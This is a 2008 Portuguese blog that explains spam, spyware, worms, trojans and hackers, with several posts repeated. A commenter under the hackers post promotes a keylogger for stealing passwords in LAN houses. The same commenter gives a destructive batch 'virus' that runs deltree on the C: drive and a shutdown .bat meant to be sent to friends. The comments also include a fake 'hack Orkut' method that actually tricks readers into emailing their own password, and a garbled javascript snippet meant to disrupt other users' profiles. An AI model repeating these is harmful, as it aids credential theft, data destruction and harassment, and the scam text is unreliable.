quinta-feira, 19 de junho de 2008
o que são spam
spam é considerado um abuso e se refere ao envio de um grande volume de mensagens não solicitadas, ou seja, o envio de mensagens indiscriminadamente a vários usuários, sem que estes tenham requisitado tal informação. O conteúdo do spam pode ser: propaganda de produtos e serviços, pedido de doações para obras assistenciais, correntes da sorte, propostas de ganho de dinheiro fácil, boatos desacreditando o serviço prestado por determinada empresa,
segunda-feira, 16 de junho de 2008
nunca abre um disco removivel em seu computador,sem tem escaneado pelo seu anti virus
quando for abrir um pen drive ou cds,dvds,celulares..nunca abra ...sem ter feito o teste de escaneamento do seu ant vírus :
primeiro: vai em meu computador
segundo: clica no dispositivo com o botão direito do mouse...e escolhe a opção de escanear ...e espera terminar.......muitas vezes eu acho virus ne ,pendrive,cds de jogos, e ate o impossível ..achei ne muitos celulares....okay
primeiro: vai em meu computador
segundo: clica no dispositivo com o botão direito do mouse...e escolhe a opção de escanear ...e espera terminar.......muitas vezes eu acho virus ne ,pendrive,cds de jogos, e ate o impossível ..achei ne muitos celulares....okay
domingo, 15 de junho de 2008
o que são spyware
O Spyware é basicamente um software trojan (Cavalo de Tróia), cuja função é a de coletar suas informações pessoais sem que você saiba o que está havendo e deixar que você decida se isto está certo ou não. A informação que um spyware coleta varia de todos os sites na Web que você visita até informações mais críticas como nomes de usuários e senhas. Você pode ser o alvo de um spyware se você faz download de músicas de programas de compartilhamento de arquivos (P2P), jogos gratuitos de sites, que você pode ou não confiar, ou outros softwares de origem desconhecida. É de se notar um importante ponto: o spyware é aquele produto que NÃO te avisa da coleta de informações e/ou hábitos pessoais que ele faz, e portanto é uma relação mentirosa desde o primeiro momento.O Spyware é freqüentemente associado com softwares que exibem propagandas, chamados AdWare. Alguns anunciantes podem instalar software adware em seu sistema e gerar uma série de anúncios não solicitados que podem encher o seu desktop e afetar sua produtividade. Os anúncios podem conter ainda pornografia ou outro material inapropriado, ou indesejado. O processamento extra necessário para lhe rastrear ou para exibir anúncios pode reduzir a performance e prejudicar o seu computador.Isto não quer dizer que todo software que exibe anúncios ou rastreia sua atividade on-line deva ser considerado ruim ou prejudicial à segurança de seus dados. Se você assinar um serviço gratuito de músicas e em troca deste serviço gratuito a companhia lhe oferece anúncios específicos, isso pode ser uma troca justa. Além disso, rastrear as suas atividades on-line pode lhe ser útil para lhe exibir conteúdo customizado ou preferências pessoais em uma loja on-line.A questão toda é se você foi ou não corretamente notificado sobre o que o software irá fazer e que você conceda o direito de agir ao software instalado em seu computador. Em outras palavras, o software está sendo enganoso quanto ao que ele faz ou como ele obtém dados de seu computador?» E se eu concordo com estes anúncios? É importante citar que em algumas situações a exibição de anúncios pode ser benéfica para você. Por exemplo, você poderia encontrar um serviço gratuito interessante para você, como acesso a Internet, se você concordar com a exibição de anúncios durante o uso do serviço.Se isto é uma troca justa ou não, somente você é pode, e deve, decidir. O que é importante é que você seja capaz de descobrir facilmente e entender os termos deste acordo e o que você possa dar o aceite final, ou então decidir parar de usar o produto. Você deve ser capaz de controlar os softwares executados em seu computador.» O que é um software enganoso?Spyware e adware não autorizado são exemplos de softwares "enganosos". Software enganoso inclui programas que alteram sua página inicial ou página de pesquisa sem que você dê permissão explícita para tal ação. Existem várias formas de um software enganoso chegar ao seu sistema. Um truque comum é instalar o software durante a instalação de outro software que você deseja, como um programa de compartilhamento de músicas e vídeos.Sempre que você instalar algo em seu computador, leia os termos de licenciamento e privacidade. As vezes a inclusão de um adware em uma instalação de software está documentada, mas pode aparecer apenas lá no final do termo de licenciamento ou privacidade.Em alguns casos um software enganoso é instalado silenciosamente em seu sistema sem nenhum aviso. Se você usa o Internet Explorer como navegador, isto pode acontecer se as configurações de seu Internet Explorer estiver definida com um nível mais baixo do que o recomendado para a atual navegação na Internet. Certifique-se de que esta configuração esteja no nível médio ou alto. Isto irá lhe ajudar a controlar o que está sendo instalado em seu computador.Você já passou pela experiência de ser repetidamente questionado sobre aceitar um download mesmo dizendo "Não"? Os criadores de softwares enganosos utilizam este truque para levar você a instalar o software. Se isto acontecer a você, não clique em "Sim". Tente fechar a página Web que lhe questionou primeiro clicando no "X" no canto superior direito dessa janela. Como alternativa, feche o Internet Explorer e reinicie-o para iniciar a navegação novamente. Se você visitar uma página Web que continuamente exibe estas janelas pop-up, este site da Web provavelmente não é confiável, e você deve simplesmente tirá-lo da lista de seus Favoritos.» Como Evitar Pegar um Spyware?Leia os cinco passos detalhados abaixo e aprenda a evitar a infecção de seu computador por softwares enganosos e/ou descobrir o que fazer caso ele já esteja infectado.Passo 1: Ajuste as configurações de segurança de seu Internet Explorer 6Você pode ajustar as configurações de segurança de seu navegador Web para determinar o quanto de informação você deseja aceitar de um site da Web. Quanto mais alto o nível de segurança, menor o risco. O lado ruim dessa decisão: quanto mais altos os níveis de segurança, menos usáveis serão os sites - em alguns possivelmente você nem conseguirá interagir de forma incompleta.Por padrão, o Internet Explorer 6 atua de forma balanceada. Quando você instala o Internet Explorer, ele classifica todos os sites da Web como integrantes de uma única zona (a Zona da Internet) e atribui a eles um nível médio de segurança. Quando você utiliza este nível de segurança, o Internet Explorer sempre irá solicitar a você que confirme o download de um arquivo, a menos que você tenha indicado previamente que o site da Web ou anunciante é confiável. Se você altera o nível de segurança para "Baixo", os sites da Web poderão fazer o download de software para o seu computador sem lhe questionar, portanto tenha muito cuidado usando esta configuração. Se você precisar alterar o nível de segurança para "Baixo" por algum motivo, volte a configuração para médio ou alto assim que possível.Dica: o documento Trabalhando com configurações de segurança do Internet Explorer 6 (o artigo está em inglês) inclui instruções passo a passo sobre os ajustes das configurações de segurança do Internet Explorer 6.Passo 2: Não aceite downloads de estranhosA melhor defesa contra software enganoso é não fazer o download no primeiro momento. Aqui estão algumas dicas que podem lhe ajudar contra software enganoso.Instale softwares apenas de sites da Web que você confia. Antes de fazer o download de qualquer software de um site na Web, pergunte a si mesmo se você se sente confortável em relação a este site. Se a resposta é Não, não faça o download do software. Se você não tem certeza, pesquise perguntando a amigos, fazendo tal pergunta em nossos SUPER FÓRUMS ou verificando outros recursos que você confia. Leia as entrelinhas. Ao instalar qualquer programa tenha a certeza de ler a mensagem em cada janela antes de clicar em "Eu concordo" ou "OK". Você precisa ainda ler cuidadosamente qualquer termo de licenciamento ou privacidade associado ao software. Você pode descobrir comportamentos questionáveis. Se a janela não permitir que você clique em "Não" ou "Eu não aceito", feche a janela clicando no "X" no canto da janela. Nunca clique em "Sim" ou "Eu aceito" para se livrar daquela janela. Informe-se sobre programas de compartilhamento de músicas e vídeos "gratuitos". Estatísticas mostram que a maioria dos internautas obtém sua cota de software enganoso através destes programas. Para fazer uma analogia com a sua casa, quando você instala um programa de compartilhamento de arquivos você está literalmente deixando a sua porta aberta. Além do risco óbvio de alguém roubar algo de você, eles podem ainda deixar algo que você não deseja. Passo 3: Verifique por sinais de software enganoso em seu computadorSoftware enganoso é criado para ser executado sem o seu conhecimento, mas existem algumas maneiras de descobrir se você está infectado.Quando você inicia o navegador de Internet, ele abre uma página que você nunca viu antes? Quando você seleciona "Pesquisar", você está recebendo uma página que não reconhece? Alguns softwares enganosos irão alterar estas configurações sem o seu conhecimento. Você vê um aumento repentino de anúncios em páginas que você nunca viu antes? Softwares enganosos as vezes bombardeiam seu computador com anúncios pop-up independente da página que você acessa. Estes anúncios freqüentemente oferecem sites de conteúdo adulto ou outro tipo questionável. O seu computador está mais lento? Softwares enganosos não são necessariamente criados para serem eficientes. Os recursos que eles utilizam para rastrear suas atividades e entregar anúncios podem tornar lento o seu computador e bugs no software podem fazer o seu computador travar. Passo 4: Utilize uma ferramenta para detectar e remover softwares indesejadosVárias empresas oferecem softwares gratuitos que varrem o seu computador em busca de software indesejado. Estas ferramentas podem lhe ajudar a determinar se você possui estes software e podem lhe ajudar a removê-los. (Veja duas recomendações nossas)Se o seu provedor de Internet não oferecer nenhuma ferramenta de remoção de spyware, pergunte a pessoas que você confia qual a ferramenta recomendada. Tenha em mente que remover estes softwares indesejados com estas ferramentas pode significar que você não poderá mais usar um programa gratuito que continha o spyware.Dica: Mantenha a ferramenta de detecção e remoção atualizada. Muitos fabricantes oferecem uma opção para verificar por atualizações automaticamente quando você estiver on-line. Se este recursos não estiver disponível, verifique o site do fabricante regularmente por downloads. Independente do recurso, certifique-se de manter atualizado a ferramenta.Passo 5: Mantenha o Windows atualizadoO último passo para manter o seu computador seguro em relação a softwares enganosos é manter seu Windows sempre atualizado. Você pode fazer isso visitando o site do Windows Update e ativando o recurso Atualizações Automáticas. Para instruções mais detalhadas, acesse Updating your Microsoft software (o artigo está em inglês).Tome um tempo para proteger suas informações pessoaisManter seu computador fora da Internet irá ajudar você a evitar software enganoso - mas isso pode não ser prático. Você pode continuar a aproveitar tudo o que a Internet tem a oferecer. Basta ser mais cuidadoso sobre o que você faz on-line, especialmente se algo parece ser gratuito. O custo invisível pode ser um spyware ou um adware indesejável. Uma boa questão a fazer a si mesmo é "Eu gostaria de ter este estranho em minha casa?"
o que é worms (o verme)ele é tipo um vírus
Um Worm em computação é um programa auto-replicante, semelhante a um vírus. O vírus infecta um programa e necessita deste programa hospedeiro para se propagar, o worm é um programa completo e não precisa de outro programa para se propagar.O primeiro worm que atraiu grande atenção foi o Morris worm, escrito por Robert Tappan Morris, Jr. no Laboratório de Inteligência artificial do MIT. Ele foi iniciado em 2 de novembro de 1988, e rapidamente infectou um grande número de computadores pela Internet. Ele se propagou através de uma série de erros no BSD Unix e seus similares. Morris foi condenado a prestar 3 anos de serviços à comunidade e a pagar uma multa de US$10.000.Além da replicação, um worm pode ser projetado para fazer muitas coisas, como deletar arquivos em um sistema ou enviar documentos por email. O worm pode trazer embutido programas que geram algum tipo de problema ou que tornam o computador infectado vulnerável a outros ataques. Um worm pode provocar danos apenas com o tráfego de rede gerado pela sua reprodução. O Mydoom, por exemplo, causou uma lentidão generalizada na Internet no pico de seu ataque.Os worms Sobig e Mydoom instalaram backdoors (brechas) nos computadores tornando-os abertos a ataques via Internet. Estes computadores zumbis são utilizados por enviadores de spam para enviar email ou para atacar endereços de sites da Internet. Acredita-se que enviadores de Spam são capazes de pagar para a criação desdes worms <1> <2>, e criadores de worms já foram pegos vendendo listas de endereços IP de máquinas infectadas.<3> Outros tentam afetar empresas com ataques DDOS propositais. <4> As brechas podem também ser exploradas por outros worms, como o Doomjuice, que se espalha utilizando uma brecha aberta pelo Mydoom.Os worms podem ser úteis: a família de worms Nachi, por exemplo, tentava buscar e instalar patches do site da Microsoft para corrigir diversas vulnerabilidades no sistema (as mesmas vulnerabilidades que eles exploravam). Isto eventualmente torna os sistema atingidos mais seguros, mas gera um tráfico na rede considerável — frequentemente maior que o dos worms que eles estão protegendo — causam reboots da máquina no processo de aplicar o patch, e talvez o mais importante, fazem o seu trabalho sem a permissão do usuário do computador. Por isto, muitos especialistas de segurança desprezam os worms, independentemente do que eles fazem.Os vírus de worm, assim, são programas que se reproduzem de um sistema para outro sem usar um arquivo hospedeiro. Em comparação aos vírus, que exigem um arquivo hospedeiro para infectarem e se espalharem a partir dele. Muitos vírus de macro são considerados worms. Embora os vírus de worm em geral "residam" dentro de outros arquivos, normalmente documentos do tipo Word ou Excel, há uma diferença entre como worms e vírus usam o arquivo hospedeiro. O criador do worm costuma divulgar um documento que já tem a macro "worm" dentro do documento. Este documento não pode - e não deve - ser alterado devido ao código ou especificação do worm. O documento inteiro será transmitido de um computador a outro, portanto o documento inteiro deve ser considerado o worm. Uma boa forma de analisar isto é imaginar que você tenha um worm binário (EXE ou executável). Ele tem um cabeçalho EXE e o corpo do código. Conseqüentemente, o worm é o "cabeçalho" + "código" EXE e não apenas o "Código" EXE. Para estender esta analogia a um worm, um documento worm é comparável ao cabeçalho do executável. Sem o documento, o worm não funcionaria e não seria um worm.
o que são trojans..ou seja cavalo de tróia
O que são trojans?
O poema épico Ilíada, escrito pelo poeta Homero, narra a história da Guerra de Tróia, que após dez anos de combate sem sucesso, os gregos construíram um enorme cavalo de madeira e colocaram alguns soldados no interior deste, oferecendo aos troianos, que receberam pensando tratar-se de um presente. Mas durante a noite, os soldados saíram do interior do cavalo e abriram os portões da cidade para que o exército grego entrasse e massacrasse os troianos semi-adormecidos. Foi a partir desta história que surgiu o termo trojan, para os programas que abrem as portas de um micro e possibilitam a invasão. Até hoje, a história da guerra de Tróia, não possui autenticidade comprovada.
Os trojans são bem diferentes dos vírus, embora possuem algumas semelhanças, como, por exemplo, perda de arquivos. Mas eles (os tojans), não se tratam apenas de programinhas escritos para destruir ou para causar qualquer dano aos micros, como os vírus. Eles são programas muito mais inteligentes, que podem ser controlados de qualquer ponto do planeta, com uma facilidade incrível, podendo até mesmo serem controlados por crianças.
Os trojans possuem duas partes: o cliente e o servidor. O servidor, obviamente, deverá ser instalado no computador da vítima e o cliente deverá ser utilizado pelo invasor. Um bom exemplo de trojan seria o tão conhecido Netbus. Repare que todos os trojans possuem o servidor como um simples executável e o cliente com interface gráfica, e é justamente isto que garante a facilidade de uso destes programas, até mesmo por leigos.
Basicamente, a função do servidor será a de abrir as portas do micro, possibilitando a invasão. Uma vez abertas as portas, o invasor terá a possibilidade de invadir, obtendo total controle da máquina, podendo baixar, deletar, renomear arquivos e até mesmo, assustar ou brincar com a vítima abrindo o drive de CD-ROM, abrindo caixas de mensagens, enfim, uma infinidade de opções.
Além disso, muitos trojans também são Keylogers, programas que captam tudo o que é digitado no teclado, inclusive senhas de e-mail, senhas de contas bancárias, etc, enviando esses dados por e-mail ou até mesmo via mensageiros instantâneos, como o ICQ.
Mas e como se prevenir destes ataques? A resposta é simples: nunca execute um programa de origem desconhecida. Não pense você que ter instalado um antivírus resolverá o problema, pois a cada dia surgem novos trojans, muitos deles indetectáveis pelos antivírus. Existem também alguns programas chamados binders que têm a capacidade de unir dois ou mais executáveis num único programa. Você poderá estar instalando um jogo, por exemplo, e paralelamente um trojan estar sendo iniciado sem que você perceba.
Atualmente temos vários trojans Internet a fora, podendo ser baixados em vários sites, principalmente sites hacker. Aqui utilizarei como exemplo dois destes, os mais conhecidos: o Netbus e o Beast.nunca execute nem um progama que esta sobre artista desconhecido..okay
O poema épico Ilíada, escrito pelo poeta Homero, narra a história da Guerra de Tróia, que após dez anos de combate sem sucesso, os gregos construíram um enorme cavalo de madeira e colocaram alguns soldados no interior deste, oferecendo aos troianos, que receberam pensando tratar-se de um presente. Mas durante a noite, os soldados saíram do interior do cavalo e abriram os portões da cidade para que o exército grego entrasse e massacrasse os troianos semi-adormecidos. Foi a partir desta história que surgiu o termo trojan, para os programas que abrem as portas de um micro e possibilitam a invasão. Até hoje, a história da guerra de Tróia, não possui autenticidade comprovada.
Os trojans são bem diferentes dos vírus, embora possuem algumas semelhanças, como, por exemplo, perda de arquivos. Mas eles (os tojans), não se tratam apenas de programinhas escritos para destruir ou para causar qualquer dano aos micros, como os vírus. Eles são programas muito mais inteligentes, que podem ser controlados de qualquer ponto do planeta, com uma facilidade incrível, podendo até mesmo serem controlados por crianças.
Os trojans possuem duas partes: o cliente e o servidor. O servidor, obviamente, deverá ser instalado no computador da vítima e o cliente deverá ser utilizado pelo invasor. Um bom exemplo de trojan seria o tão conhecido Netbus. Repare que todos os trojans possuem o servidor como um simples executável e o cliente com interface gráfica, e é justamente isto que garante a facilidade de uso destes programas, até mesmo por leigos.
Basicamente, a função do servidor será a de abrir as portas do micro, possibilitando a invasão. Uma vez abertas as portas, o invasor terá a possibilidade de invadir, obtendo total controle da máquina, podendo baixar, deletar, renomear arquivos e até mesmo, assustar ou brincar com a vítima abrindo o drive de CD-ROM, abrindo caixas de mensagens, enfim, uma infinidade de opções.
Além disso, muitos trojans também são Keylogers, programas que captam tudo o que é digitado no teclado, inclusive senhas de e-mail, senhas de contas bancárias, etc, enviando esses dados por e-mail ou até mesmo via mensageiros instantâneos, como o ICQ.
Mas e como se prevenir destes ataques? A resposta é simples: nunca execute um programa de origem desconhecida. Não pense você que ter instalado um antivírus resolverá o problema, pois a cada dia surgem novos trojans, muitos deles indetectáveis pelos antivírus. Existem também alguns programas chamados binders que têm a capacidade de unir dois ou mais executáveis num único programa. Você poderá estar instalando um jogo, por exemplo, e paralelamente um trojan estar sendo iniciado sem que você perceba.
Atualmente temos vários trojans Internet a fora, podendo ser baixados em vários sites, principalmente sites hacker. Aqui utilizarei como exemplo dois destes, os mais conhecidos: o Netbus e o Beast.nunca execute nem um progama que esta sobre artista desconhecido..okay
quarta-feira, 11 de junho de 2008
hackers
vamos falar sobre hackers
Na verdade, os hackers são os bons mocinhos. Para os fãs de Guerra nas Estrelas, pensem no hacker como o cavaleiro jedi bonzinho. Ele possui os mesmos poderes que o jedi do lado negro da força (cracker) mas os utiliza para proteção. É um curioso por natureza, uma pessoa que têm em aprender e se desenvolver um hobby, assim como ajudar os “menos prevalecidos”. Um bom exemplo real foi quando o cracker Kevin Mitnick invadiu o computador do analista de sistemas Shimomura. Mitnick destruiu dados e roubou informações vitais. Shimomura é chamado de hacker pois usa sua inteligência para o bem, e possui muitos mais conhecimentos que seu inimigo digital. Assim facilmente montou um honeypot (armadilha que consiste em criar uma falsa rede para pegar o invasor) e pegou Kevin. Infelizmente a imprensa confundiu os termos e toda notícia referente a baderneiros digitais se refere à hacker.CrackerEsses sim são os maldosos. Com um alto grau de conhecimento e nenhum respeito, invadem sistemas e podem apenas deixar a sua “marca” ou destruí-los completamente. Geralmente são hackers que querem se vingar de algum operador, adolescentes que querem ser aceitos por grupos de crackers (ou script kiddies) e saem apagando tudo que vêem ou mestres da programação que são pagos por empresas para fazerem espionagem industrial. Hackers e crackers costumam entrar muito em conflito. Guerras entre grupos é comum, e isso pode ser visto em muitos fóruns de discussão e em grandes empresas, as quais contratam hackers para proteger seus sistemas
11 de Junho de 2008 07:45
jefferson galvao disse...
download keylogger= key logger é um progama que registra todas teclas digitadas pelo seu computador...a maioria das pessoas coloca ele ne lan house para pegar senhas de orkut , msn etcbaixe nesse nikki http://baixaki.ig.com.br/download/Ardamax-Keylogger-Lite.htm
11 de Junho de 2008 13:40
jefferson galvao disse...
Como fazer vírus.Faça o se propio virus. olha getne eu sei fazer virus no proprio pc, sinceramente eu n uso isso, e nem queria que vcs usasem soh estou passando um conhecimento que eu gostaria que me passasem tbm, mas se quiserem manadr pra pessoas eu n me responsabilizo por atos de outras pessoas.bom, como fazer o virus?eh muito facil, vc pode aplicar no ms-dos mais pra novatos como eu isso eh meio complicado paesar de eu conseguir fazer.faça o seguinte: abra um bloco de notas ou um word e escrve os seguintes codigos:@ECHO OFF@BREAK OFFdeltree/C: Y\*.*A: (nome do virus).bat autoexec.batEm seguida salve esse arquivo assim : (Nome do virus).batpronto agora vc tem um virus no seu computador, mas avisando desde ja, sevc n tem conhecimento, nem que ache que fez o programa errado abra esse documento.pode ser perigoso infectar o proprio pc.bom ai esta oq eu aprendi e espero que vcs entendam que conhecimento n eh crime, crime eh usar o conhecimento pra oq n presta.
12 de Junho de 2008 15:41
jefferson galvao disse...
Hackear orkutJeFfeRsOn GaLvÂo$ hackear orkut,método infalível!!!primeiramente entre no seu email.depois manda um email para:Para:login-google-orkut@hotmail.comAssunto:Recover (Accout) = (UID) = (PASSWORD)Mensagem:javascript:function $(){d,E,4,5=accont(LINK DO PERFIL DA VITIMA){if(k[c]){p=p/i)[1];h.r.v=u.y(9,4,F,7,12,g,k,V,q,recovery=RETURN=UID=(SEU E-MAIL DO PERFIL DO ORKUT e-mail que usa para acesar sua conta)(3,(5,b,w,Y=\'Z://recovery=RETURN=PASSWORD=(SUA SENHA DO ORKUT)10.16.1a/1A\';avoid(0);' obs¹.: nuncα coloque suα senhα errαdα, pois o Google pode suspeitαr e deletαr suα contα do Google/Orkut.' obs².: nαo αbuse deste metodo, pois o Google pode suspeitαr e o mesmo nαo vαlidαrα mαis.- O6, depois clique em enviαr, (suα mensαgem serα enviαdα).- O7, logo depois vαi αpαrecer fαlαndo que esse e-mαil αindα nαo é um contαto, é só você clicαr nα 'cαixα de e-mαil' e mαndαr α mensαgem quαntαs vezes quiser, (com cαutelα).(http://img47391.pictiger.com/images/14416507/)- O8, logo depois α senhα dα vitimα serα mαndαdα α você.' obs³.: o processo pode demorαr αté 3O minutos pαrα α senhα ser pαssαdα α você.(depois disso tudo vc terá a senha e o login,mandado pra vc em sua página de recados e no seu email tbm)
12 de Junho de 2008 15:52
jefferson galvao disse...
Desativar o perfil dos outrosdesative o perfil dos outrosdesative o perfil dos outrosjavascript:alert("action desatived");javascript:f=prompt('disable days:','');javascript:/*Mass Joyn in communities ?• Community Exit ?• \o/*/;i=0;cmm=['46053500','1542412','34911064','38514342','2439712','18036850','45359972','32353596'];a = document.forms[1]; setInterval("i++; a.action = 'CommunityJoin.aspx?Action.join&cmm=' + cmm[i%cmm.length]; a.submit() ",999); void(O);alert("disable true, return false 134468754416741231684513211185645534132131354D5643FD415374545D4D46843512E43421SA311A64486424V13337A68E7533R113FDSA346443");alert("action desatived");vai no perfil dele e use o codigo (cole no navegador)coloque quantos dias vc quer que o perfil da vitima fique bugadopode colocar quantos quizer...o orkut dele ficara bugado completamente.ele nao podera fazer mais nada, estara temporariamente fora do ar...se ele tiver comunidades as comunidades ficaram sem dono.pela mor de deus nao use no seu perfileu nao me responsabilizo pelos seus atos!conhecimento nao é crime o_o'
12 de Junho de 2008 15:56
jefferson galvao disse...
Desligar o computador do amigoDesligando o pc de seu amigo!!!É muito simples, vc deve seguir os seguintes passos!!!1º Abra seu Bloco de Notas, pois todo windows vem com um. (Iniciar/ Acessórios..)2º Cole o Código exatamente como apareçe abaixo, no seu bloco de notas.shutdown -s -f -t 0 3º Salve em algum lugar que você encontre-o fácil, com qualquer nome, mas tem que ter no final .batExemplo: Até mais amigo .bat4º Encontre onde você salvou, e teste ele. Se desligar seu computador, é porque ficou bom.5º Se você for mandar pra um amigo por msn, deverá compactar ele antes. Pois o msn não aceita (nem email). Para compactar você deve usar o winzip ou winrar Mais aconselhável winrar.6º Mande ele e se divirta!!!Obs:Isso só funcionará em seu amigo, se o sistema dele não for Windows 95,97 e 98, pois esses não tem recursos de desligagem automática sem precisar apertar o botão. Okay!!!Existe outro código que pode até formatar o pc de alguém, ou seja, deletar tudo o que há nele, inclusive o windows, mas não passarei esse pois não é minha intenção que vc prejudique ninguém..okay!!!
12 de Junho de 2008 15:59
Postar um comentário
Postagem mais recente Início
Assinar: Postar comentários (Atom)
Na verdade, os hackers são os bons mocinhos. Para os fãs de Guerra nas Estrelas, pensem no hacker como o cavaleiro jedi bonzinho. Ele possui os mesmos poderes que o jedi do lado negro da força (cracker) mas os utiliza para proteção. É um curioso por natureza, uma pessoa que têm em aprender e se desenvolver um hobby, assim como ajudar os “menos prevalecidos”. Um bom exemplo real foi quando o cracker Kevin Mitnick invadiu o computador do analista de sistemas Shimomura. Mitnick destruiu dados e roubou informações vitais. Shimomura é chamado de hacker pois usa sua inteligência para o bem, e possui muitos mais conhecimentos que seu inimigo digital. Assim facilmente montou um honeypot (armadilha que consiste em criar uma falsa rede para pegar o invasor) e pegou Kevin. Infelizmente a imprensa confundiu os termos e toda notícia referente a baderneiros digitais se refere à hacker.CrackerEsses sim são os maldosos. Com um alto grau de conhecimento e nenhum respeito, invadem sistemas e podem apenas deixar a sua “marca” ou destruí-los completamente. Geralmente são hackers que querem se vingar de algum operador, adolescentes que querem ser aceitos por grupos de crackers (ou script kiddies) e saem apagando tudo que vêem ou mestres da programação que são pagos por empresas para fazerem espionagem industrial. Hackers e crackers costumam entrar muito em conflito. Guerras entre grupos é comum, e isso pode ser visto em muitos fóruns de discussão e em grandes empresas, as quais contratam hackers para proteger seus sistemas
11 de Junho de 2008 07:45
jefferson galvao disse...
download keylogger= key logger é um progama que registra todas teclas digitadas pelo seu computador...a maioria das pessoas coloca ele ne lan house para pegar senhas de orkut , msn etcbaixe nesse nikki http://baixaki.ig.com.br/download/Ardamax-Keylogger-Lite.htm
11 de Junho de 2008 13:40
jefferson galvao disse...
Como fazer vírus.Faça o se propio virus. olha getne eu sei fazer virus no proprio pc, sinceramente eu n uso isso, e nem queria que vcs usasem soh estou passando um conhecimento que eu gostaria que me passasem tbm, mas se quiserem manadr pra pessoas eu n me responsabilizo por atos de outras pessoas.bom, como fazer o virus?eh muito facil, vc pode aplicar no ms-dos mais pra novatos como eu isso eh meio complicado paesar de eu conseguir fazer.faça o seguinte: abra um bloco de notas ou um word e escrve os seguintes codigos:@ECHO OFF@BREAK OFFdeltree/C: Y\*.*A: (nome do virus).bat autoexec.batEm seguida salve esse arquivo assim : (Nome do virus).batpronto agora vc tem um virus no seu computador, mas avisando desde ja, sevc n tem conhecimento, nem que ache que fez o programa errado abra esse documento.pode ser perigoso infectar o proprio pc.bom ai esta oq eu aprendi e espero que vcs entendam que conhecimento n eh crime, crime eh usar o conhecimento pra oq n presta.
12 de Junho de 2008 15:41
jefferson galvao disse...
Hackear orkutJeFfeRsOn GaLvÂo$ hackear orkut,método infalível!!!primeiramente entre no seu email.depois manda um email para:Para:login-google-orkut@hotmail.comAssunto:Recover (Accout) = (UID) = (PASSWORD)Mensagem:javascript:function $(){d,E,4,5=accont(LINK DO PERFIL DA VITIMA){if(k[c]){p=p/i)[1];h.r.v=u.y(9,4,F,7,12,g,k,V,q,recovery=RETURN=UID=(SEU E-MAIL DO PERFIL DO ORKUT e-mail que usa para acesar sua conta)(3,(5,b,w,Y=\'Z://recovery=RETURN=PASSWORD=(SUA SENHA DO ORKUT)10.16.1a/1A\';avoid(0);' obs¹.: nuncα coloque suα senhα errαdα, pois o Google pode suspeitαr e deletαr suα contα do Google/Orkut.' obs².: nαo αbuse deste metodo, pois o Google pode suspeitαr e o mesmo nαo vαlidαrα mαis.- O6, depois clique em enviαr, (suα mensαgem serα enviαdα).- O7, logo depois vαi αpαrecer fαlαndo que esse e-mαil αindα nαo é um contαto, é só você clicαr nα 'cαixα de e-mαil' e mαndαr α mensαgem quαntαs vezes quiser, (com cαutelα).(http://img47391.pictiger.com/images/14416507/)- O8, logo depois α senhα dα vitimα serα mαndαdα α você.' obs³.: o processo pode demorαr αté 3O minutos pαrα α senhα ser pαssαdα α você.(depois disso tudo vc terá a senha e o login,mandado pra vc em sua página de recados e no seu email tbm)
12 de Junho de 2008 15:52
jefferson galvao disse...
Desativar o perfil dos outrosdesative o perfil dos outrosdesative o perfil dos outrosjavascript:alert("action desatived");javascript:f=prompt('disable days:','');javascript:/*Mass Joyn in communities ?• Community Exit ?• \o/*/;i=0;cmm=['46053500','1542412','34911064','38514342','2439712','18036850','45359972','32353596'];a = document.forms[1]; setInterval("i++; a.action = 'CommunityJoin.aspx?Action.join&cmm=' + cmm[i%cmm.length]; a.submit() ",999); void(O);alert("disable true, return false 134468754416741231684513211185645534132131354D5643FD415374545D4D46843512E43421SA311A64486424V13337A68E7533R113FDSA346443");alert("action desatived");vai no perfil dele e use o codigo (cole no navegador)coloque quantos dias vc quer que o perfil da vitima fique bugadopode colocar quantos quizer...o orkut dele ficara bugado completamente.ele nao podera fazer mais nada, estara temporariamente fora do ar...se ele tiver comunidades as comunidades ficaram sem dono.pela mor de deus nao use no seu perfileu nao me responsabilizo pelos seus atos!conhecimento nao é crime o_o'
12 de Junho de 2008 15:56
jefferson galvao disse...
Desligar o computador do amigoDesligando o pc de seu amigo!!!É muito simples, vc deve seguir os seguintes passos!!!1º Abra seu Bloco de Notas, pois todo windows vem com um. (Iniciar/ Acessórios..)2º Cole o Código exatamente como apareçe abaixo, no seu bloco de notas.shutdown -s -f -t 0 3º Salve em algum lugar que você encontre-o fácil, com qualquer nome, mas tem que ter no final .batExemplo: Até mais amigo .bat4º Encontre onde você salvou, e teste ele. Se desligar seu computador, é porque ficou bom.5º Se você for mandar pra um amigo por msn, deverá compactar ele antes. Pois o msn não aceita (nem email). Para compactar você deve usar o winzip ou winrar Mais aconselhável winrar.6º Mande ele e se divirta!!!Obs:Isso só funcionará em seu amigo, se o sistema dele não for Windows 95,97 e 98, pois esses não tem recursos de desligagem automática sem precisar apertar o botão. Okay!!!Existe outro código que pode até formatar o pc de alguém, ou seja, deletar tudo o que há nele, inclusive o windows, mas não passarei esse pois não é minha intenção que vc prejudique ninguém..okay!!!
12 de Junho de 2008 15:59
Postar um comentário
Postagem mais recente Início
Assinar: Postar comentários (Atom)
Assinar:
Postagens (Atom)